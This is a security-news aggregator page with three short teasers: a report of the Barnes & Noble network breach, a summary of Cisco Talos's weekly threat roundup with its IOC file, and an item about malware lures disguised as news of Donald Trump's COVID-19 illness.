American bookselling giant Barnes & Noble is contacting customers via email, warning them that its network was breached by hackers, and that sensitive information about shoppers may have been accessed. In the email to customers, Barnes & Noble says that it became aware that it had fallen victim to a cybersecurity attack on Saturday October […]… Read More

The post Barnes & Noble warns customers it has been hacked, customer data may have been accessed appeared first on The State of Security.

Threat Roundup for October 2 to October 9

Today, Talos is publishing a glimpse into the most prevalent threats we’ve observed between September 25 and October 2. As with previous roundups, this post isn’t meant to be an in-depth analysis. Instead, this post will summarize the threats we’ve observed by highlighting key behavioral characteristics, indicators of compromise, and discussing how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of the date of publication. Additionally, please keep in mind that IOC searching is only one part of threat hunting. Spotting a single IOC does not necessarily indicate maliciousness. Detection and coverage for the following threats is subject to updates, pending additional threat or vulnerability analysis. For the most current information, please refer to your Firepower Management Center, Snort.org, or ClamAV.net.

Read More

Reference

20201009-tru.json – this is a JSON file that includes the IOCs referenced in this post, as well as all hashes associated with the cluster. The list is limited to 25 hashes in this blog post. As always, please remember that all IOCs contained in this document are indicators, and that one single IOC does not indicate maliciousness. See the Read More link above for more details.

The post Threat Roundup for October 2 to October 9 appeared first on Cisco Blogs.

Hackers disguise malware attack as new details on Donald Trump’s COVID-19 illness

The confirmation that US President Donald Trump has been infected by the Coronavirus, and had to spend time this weekend in hospital, has – understandably – made headlines around the world. And there are plenty of people, on both sides of the political divide, who are interested in learning more about his health status. It’s […]… Read More

The post Hackers disguise malware attack as new details on Donald Trump’s COVID-19 illness appeared first on The State of Security.